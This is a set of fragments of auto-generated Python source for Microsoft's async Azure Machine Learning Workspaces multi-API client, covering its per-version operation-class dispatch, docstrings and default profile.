:class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeVersionsOperations>` * 2022-05-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeVersionsOperations>` \"\"\" api_version = self._get_api_version('code_versions')", "* 2022-05-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentContainersOperations>` \"\"\" api_version = self._get_api_version('component_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "subscription. 
:type subscription_id: str :param api_version: API version to use if no profile", "2021-10-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.VirtualMachineSizesOperations>` * 2022-01-01-preview: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.VirtualMachineSizesOperations>` * 2022-05-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.VirtualMachineSizesOperations>` \"\"\" api_version = self._get_api_version('virtual_machine_sizes') if", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def datasets_v1(self): \"\"\"Instance depends on the API version:", "information. # # Code generated by Microsoft (R) AutoRest Code Generator. # Changes", "return models elif api_version == 'v1.0': from ..registry_discovery import models return models elif", "on the API version: * 2021-10-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelContainersOperations>` * 2022-02-01-preview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelContainersOperations>`", "online_endpoints(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineEndpointsOperations>` * 2022-02-01-preview: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineEndpointsOperations>`", "multiapi azure-core based client \"\"\" pass class AzureMachineLearningWorkspaces(MultiApiClientMixin, _SDKClient): \"\"\"These APIs allow 
end", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import BatchEndpointsOperations as OperationClass elif api_version == '2022-02-01-preview':", "depends on the API version: * 1.5.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DeleteOperations>` * v1.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.DeleteOperations>` \"\"\" api_version", "def data_call(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DataCallOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataCallOperations>` \"\"\" api_version", "2022-05-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComputeOperations>` \"\"\" api_version = self._get_api_version('compute') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "else: raise ValueError(\"API version {} does not have operation group 'registry_management_non_workspace'\".format(api_version)) return OperationClass(self._client,", "version {} does not have operation group 'compute'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import Operations as OperationClass elif api_version ==", "import BatchJobDeploymentOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import OnlineEndpointsOperations as OperationClass elif api_version", "'1.5.0': from ..dataset_dataplane.aio.operations import DataVersionOperations as OperationClass else: raise ValueError(\"API version {} does", "..v2021_10_01_dataplanepreview.aio.operations import ModelContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from 
..v2022_02_01_preview.aio.operations import ModelContainersOperations", "import DataContainersOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "is a fake class to support current implemetation of MultiApiClientMixin.\" Will be removed", "does not have operation group 'usages'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "from ..v2022_05_01.aio.operations import DatastoresOperations as OperationClass else: raise ValueError(\"API version {} does not", "on the API version: * 1.5.0: :class:`DataContainerOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataContainerOperations>` \"\"\" api_version = self._get_api_version('data_container') if api_version", ":class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeVersionsOperations>` \"\"\" api_version = self._get_api_version('code_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import CodeVersionsOperations", ":class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceConnectionsOperations>` \"\"\" api_version = self._get_api_version('workspace_connections') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspaceConnectionsOperations", "as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ComponentContainersOperations as OperationClass elif", "**kwargs) super(AzureMachineLearningWorkspaces, self).__init__( api_version=api_version, profile=profile ) @classmethod def _models_dict(cls, api_version): return {k: v", "group 'batch_endpoints'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def 
batch_job_deployment(self): \"\"\"Instance depends on", "import OnlineEndpointsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import OnlineEndpointsOperations as", ":class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateLinkResourcesOperations>` \"\"\" api_version = self._get_api_version('private_link_resources') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import PrivateLinkResourcesOperations", "= self._get_api_version('private_endpoint_connections') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass elif", "BatchJobEndpointOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "* 2021-10-01: :mod:`v2021_10_01.models<azure.mgmt.machinelearningservices.v2021_10_01.models>` * 2021-10-01-dataplanepreview: :mod:`v2021_10_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.models>` * 2022-01-01-preview: :mod:`v2022_01_01_preview.models<azure.mgmt.machinelearningservices.v2022_01_01_preview.models>` * 2022-02-01-preview: :mod:`v2022_02_01_preview.models<azure.mgmt.machinelearningservices.v2022_02_01_preview.models>` *", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComponentContainersOperations as OperationClass else: raise ValueError(\"API version", "2022-05-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.VirtualMachineSizesOperations>` \"\"\" api_version = self._get_api_version('virtual_machine_sizes') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) async def close(self): await self._client.close() async def __aenter__(self): await self._client.__aenter__() return", 
"..v2022_01_01_preview.aio.operations import WorkspacesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspacesOperations", "operation group 'datastores'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def delete(self): \"\"\"Instance depends", "from azure.core.credentials import TokenCredential from azure.core.credentials_async import AsyncTokenCredential class _SDKClient(object): def __init__(self, *args,", "profile sets a mapping between an operation group and its API version. The", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_controller_v2(self): \"\"\"Instance depends on the API version: *", "API version: * 1.0.0: :class:`ModelsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ModelsOperations>` \"\"\" api_version = self._get_api_version('models') if api_version == '1.0.0':", "* 2022-05-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DatastoresOperations>` \"\"\" api_version = self._get_api_version('datastores') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "API version: * v1.0: :class:`RunOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunOperations>` \"\"\" api_version = self._get_api_version('run') if api_version == 'v1.0':", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import OnlineDeploymentsOperations as OperationClass else: raise ValueError(\"API", "on the API version: * 2021-10-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspacesOperations>` * 2022-01-01-preview: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspacesOperations>` * 2022-05-01: 
:class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspacesOperations>`", "2022-05-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceFeaturesOperations>` \"\"\" api_version = self._get_api_version('workspace_features') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "the Azure clouds (Azure Stack, Azure Government, Azure China, etc.). By default, it", "as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspacesOperations as OperationClass elif", "depends on the API version: * 1.5.0: :class:`DataVersionOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataVersionOperations>` \"\"\" api_version = self._get_api_version('data_version') if", "else: raise ValueError(\"API version {} does not have operation group 'dataset_v2'\".format(api_version)) return OperationClass(self._client,", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentVersionsOperations>` *", "'2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "raise ValueError(\"API version {} does not have operation group 'datasets_v1'\".format(api_version)) return OperationClass(self._client, self._config,", "'dataset_containers': '2021-10-01', 'dataset_controller_v2': '1.5.0', 'dataset_v2': '1.5.0', 'dataset_versions': '2021-10-01', 'datasets_v1': '1.5.0', 'delete': 'v1.0', 'events':", "* 1.5.0: 
:class:`DataVersionOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataVersionOperations>` \"\"\" api_version = self._get_api_version('data_version') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations", "experiments(self): \"\"\"Instance depends on the API version: * v1.0: :class:`ExperimentsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.ExperimentsOperations>` \"\"\" api_version =", "else: raise ValueError(\"API version {} does not have operation group 'online_deployments'\".format(api_version)) return OperationClass(self._client,", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'registry_management_non_workspace'\".format(api_version))", "depends on the API version: * 1.0.0: :class:`ModelsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ModelsOperations>` \"\"\" api_version = self._get_api_version('models') if", "import WorkspaceConnectionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspaceConnectionsOperations as", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def component_containers(self): \"\"\"Instance depends on the API version: *", "OnlineEndpointsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "if api_version == 'v1.0': from ..registry_discovery.aio.operations import RegistryManagementNonWorkspaceOperations as OperationClass else: raise ValueError(\"API", "disable=unused-import,ungrouped-imports from azure.core.credentials import TokenCredential from azure.core.credentials_async import AsyncTokenCredential class _SDKClient(object): def __init__(self,", "as OperationClass elif api_version == 'v1.0': from ..runhistory.aio.operations import DeleteOperations as OperationClass else:", "as OperationClass elif api_version == '2022-05-01': 
from ..v2022_05_01.aio.operations import UsagesOperations as OperationClass else:", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import VirtualMachineSizesOperations as OperationClass else: raise ValueError(\"API", "* 2022-05-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateEndpointConnectionsOperations>` \"\"\" api_version = self._get_api_version('private_endpoint_connections') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "API version: * 2021-10-01: :class:`Operations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.Operations>` * 2022-01-01-preview: :class:`Operations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.Operations>` * 2022-05-01: :class:`Operations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.Operations>` \"\"\" api_version", "else: raise ValueError(\"API version {} does not have operation group 'async_operations'\".format(api_version)) return OperationClass(self._client,", "the API version: * 1.5.0: :class:`DataVersionOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataVersionOperations>` \"\"\" api_version = self._get_api_version('data_version') if api_version ==", "API version: * 2021-10-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelContainersOperations>` * 2022-02-01-preview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelContainersOperations>` * 2022-05-01:", ":class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.QuotasOperations>` \"\"\" api_version = self._get_api_version('quotas') if api_version == '2021-10-01': from 
..v2021_10_01.aio.operations import QuotasOperations", "group 'private_link_resources'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def quotas(self): \"\"\"Instance depends on", "\"AsyncTokenCredential\", subscription_id: str, api_version: Optional[str] = None, base_url: str = \"https://management.azure.com\", profile: KnownProfiles", "does not have operation group 'workspace_connections'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "on the API version: * 2021-10-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.VirtualMachineSizesOperations>` * 2022-01-01-preview: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.VirtualMachineSizesOperations>` * 2022-05-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.VirtualMachineSizesOperations>`", "== '2022-05-01': from ..v2022_05_01.aio.operations import OnlineEndpointsOperations as OperationClass else: raise ValueError(\"API version {}", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'batch_job_endpoint'\".format(api_version)) return", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def temporary_data_references(self): \"\"\"Instance depends on the API", "* 2021-10-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentContainersOperations>` * 2021-10-01-dataplanepreview: 
:class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentContainersOperations>` * 2022-02-01-preview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentContainersOperations>` * 2022-05-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentContainersOperations>` \"\"\"", "EventsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "'dataset_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def datasets_v1(self): \"\"\"Instance depends on the", "api_version = self._get_api_version('run') if api_version == 'v1.0': from ..runhistory.aio.operations import RunOperations as OperationClass", "'2021-10-01', 'datasets_v1': '1.5.0', 'delete': 'v1.0', 'events': 'v1.0', 'experiments': 'v1.0', 'extensive_model': '1.0.0', 'get_operation_status': '1.5.0',", "versions, to help you deal with all of the Azure clouds (Azure Stack,", "api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ComponentContainersOperations as OperationClass elif api_version == '2022-05-01':", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def jobs(self): \"\"\"Instance depends on the API version: *", "* 2022-02-01-preview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentContainersOperations>` * 2022-05-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentContainersOperations>` \"\"\" api_version = self._get_api_version('component_containers') if api_version ==", "version {} does not have operation group 
'component_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "self._get_api_version('datastores') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatastoresOperations as OperationClass elif api_version", "Azure China, etc.). By default, it uses the latest API version available on", "end users to operate on Azure Machine Learning Workspace resources. This ready contains", "\"\"\" api_version = self._get_api_version('batch_job_endpoint') if api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobEndpointOperations as", "..v2022_05_01.aio.operations import PrivateLinkResourcesOperations as OperationClass else: raise ValueError(\"API version {} does not have", "== '2021-10-01': from ..v2021_10_01.aio.operations import WorkspaceConnectionsOperations as OperationClass elif api_version == '2022-01-01-preview': from", "== '1.0.0': from ..model_dataplane.aio.operations import ModelsOperations as OperationClass else: raise ValueError(\"API version {}", "data_containers(self): \"\"\"Instance depends on the API version: * 2022-02-01-preview: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataContainersOperations>` * 2022-05-01: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataContainersOperations>`", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import OnlineDeploymentsOperations as OperationClass elif api_version ==", "import DatasetControllerV2Operations as OperationClass else: raise ValueError(\"API version {} does not have operation", "group 'async_operations'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def 
batch_deployments(self): \"\"\"Instance depends on", "..v2021_10_01.aio.operations import DatasetVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "..v2022_01_01_preview.aio.operations import QuotasOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import QuotasOperations", "Optional[str] = None, base_url: str = \"https://management.azure.com\", profile: KnownProfiles = KnownProfiles.default, **kwargs #", "OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import PrivateEndpointConnectionsOperations as OperationClass elif api_version", "coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed", "self._get_api_version('private_link_resources') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import PrivateLinkResourcesOperations as OperationClass elif api_version", "import DataCallOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "missing in profile. 
:type api_version: str :param base_url: Service URL :type base_url: str", "'2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview import models return models elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview", "from ..v2022_02_01_preview.aio.operations import DataContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "ValueError(\"API version {} does not have operation group 'model_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "= self._get_api_version('workspace_features') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspaceFeaturesOperations as OperationClass elif", "'model_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def model_versions(self): \"\"\"Instance depends on the", "= self._get_api_version('runs') if api_version == 'v1.0': from ..runhistory.aio.operations import RunsOperations as OperationClass else:", "'v1.0', 'spans': 'v1.0', 'temporary_data_references': '2021-10-01-dataplanepreview', }}, _PROFILE_TAG + \" latest\" ) def __init__(", "Deserializer(self._models_dict(api_version))) @property def batch_job_endpoint(self): \"\"\"Instance depends on the API version: * 2020-09-01-dataplanepreview: :class:`BatchJobEndpointOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobEndpointOperations>`", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import BatchEndpointsOperations as OperationClass else: raise", "== '2022-01-01-preview': from ..v2022_01_01_preview import models return models elif api_version == '2022-02-01-preview': from", "version of multiapi azure-core based client \"\"\" pass class 
AzureMachineLearningWorkspaces(MultiApiClientMixin, _SDKClient): \"\"\"These APIs", ":class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataContainersOperations>` * 2022-05-01: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataContainersOperations>` \"\"\" api_version = self._get_api_version('data_containers') if api_version == '2022-02-01-preview': from", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'datasets_v1'\".format(api_version)) return", "2022-02-01-preview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeVersionsOperations>` * 2022-05-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeVersionsOperations>` \"\"\" api_version = self._get_api_version('code_versions') if api_version == '2021-10-01':", "'data_version'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_versions(self): \"\"\"Instance depends on the", "the API version: * 2021-10-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatastoresOperations>` * 2022-02-01-preview: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DatastoresOperations>` * 2022-05-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DatastoresOperations>` \"\"\"", "Service URL :type base_url: str :param profile: A profile definition, from KnownProfiles to", "import UsagesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import UsagesOperations as", "..v2020_09_01_dataplanepreview.aio.operations import BatchJobDeploymentOperations as OperationClass else: 
raise ValueError(\"API version {} does not have", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DataVersionsOperations as OperationClass else: raise ValueError(\"API", "@property def get_operation_status(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`GetOperationStatusOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.GetOperationStatusOperations>` \"\"\"", "version: * 2021-10-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelContainersOperations>` * 2022-02-01-preview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelContainersOperations>` * 2022-05-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelContainersOperations>`", "the API version: * 2021-10-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentVersionsOperations>` * 2022-02-01-preview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentVersionsOperations>` *", ":class:`Operations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.Operations>` * 2022-05-01: :class:`Operations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.Operations>` \"\"\" api_version = self._get_api_version('operations') if api_version == '2021-10-01': from", "elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspaceConnectionsOperations as OperationClass 
elif api_version ==", "OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import CodeContainersOperations as OperationClass elif api_version", "from ..v2021_10_01_dataplanepreview.aio.operations import ComponentContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import", ":class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineDeploymentsOperations>` \"\"\" api_version = self._get_api_version('online_deployments') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import OnlineDeploymentsOperations", "version {} does not have operation group 'usages'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "'dataset_controller_v2'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_v2(self): \"\"\"Instance depends on the", "== 'v1.0': from ..runhistory.aio.operations import RunOperations as OperationClass else: raise ValueError(\"API version {}", "class AzureMachineLearningWorkspaces(MultiApiClientMixin, _SDKClient): \"\"\"These APIs allow end users to operate on Azure Machine", "on the API version: * 2022-02-01-preview: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataVersionsOperations>` * 2022-05-01: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataVersionsOperations>` \"\"\" api_version =", "raise ValueError(\"API version {} does not have operation group 'virtual_machine_sizes'\".format(api_version)) return OperationClass(self._client, self._config,", "particular api-version and/or profile. 
The profile sets a mapping between an operation group", "import ComponentVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ComponentVersionsOperations as", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def quotas(self): \"\"\"Instance depends on the API version:", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import UsagesOperations as OperationClass else: raise", "DataContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DataContainersOperations as OperationClass", "OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version", "operation group 'events'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def experiments(self): \"\"\"Instance depends", "Any ) -> None: self._config = AzureMachineLearningWorkspacesConfiguration(credential, subscription_id, **kwargs) self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config,", "ValueError(\"API version {} is not available\".format(api_version)) @property def assets(self): \"\"\"Instance depends on the", "not have operation group 'online_endpoints'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def operations(self):", "API version: * 2021-10-01-dataplanepreview: :class:`TemporaryDataReferencesOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.TemporaryDataReferencesOperations>` \"\"\" api_version = 
self._get_api_version('temporary_data_references') if api_version == '2021-10-01-dataplanepreview':", "= self._get_api_version('registry_management_non_workspace') if api_version == 'v1.0': from ..registry_discovery.aio.operations import RegistryManagementNonWorkspaceOperations as OperationClass else:", "on the API version: * 2021-10-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceFeaturesOperations>` * 2022-01-01-preview: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceFeaturesOperations>` * 2022-05-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceFeaturesOperations>`", "API versions, to help you deal with all of the Azure clouds (Azure", "api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import OnlineEndpointsOperations as OperationClass elif api_version == '2022-05-01':", "version: * v1.0: :class:`RunsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunsOperations>` \"\"\" api_version = self._get_api_version('runs') if api_version == 'v1.0': from", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'migration'\".format(api_version))", "elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ComponentVersionsOperations as OperationClass elif api_version ==", "api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetV2Operations as OperationClass else: raise ValueError(\"API version", "Code Generator. 
# Changes may cause incorrect behavior and will be lost if", "from ..v2021_10_01.aio.operations import VirtualMachineSizesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import", "from ..v2022_05_01.aio.operations import BatchEndpointsOperations as OperationClass else: raise ValueError(\"API version {} does not", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import CodeVersionsOperations as OperationClass elif api_version ==", "version {} does not have operation group 'workspace_features'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "@property def data_container(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DataContainerOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataContainerOperations>` \"\"\"", "'model_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def 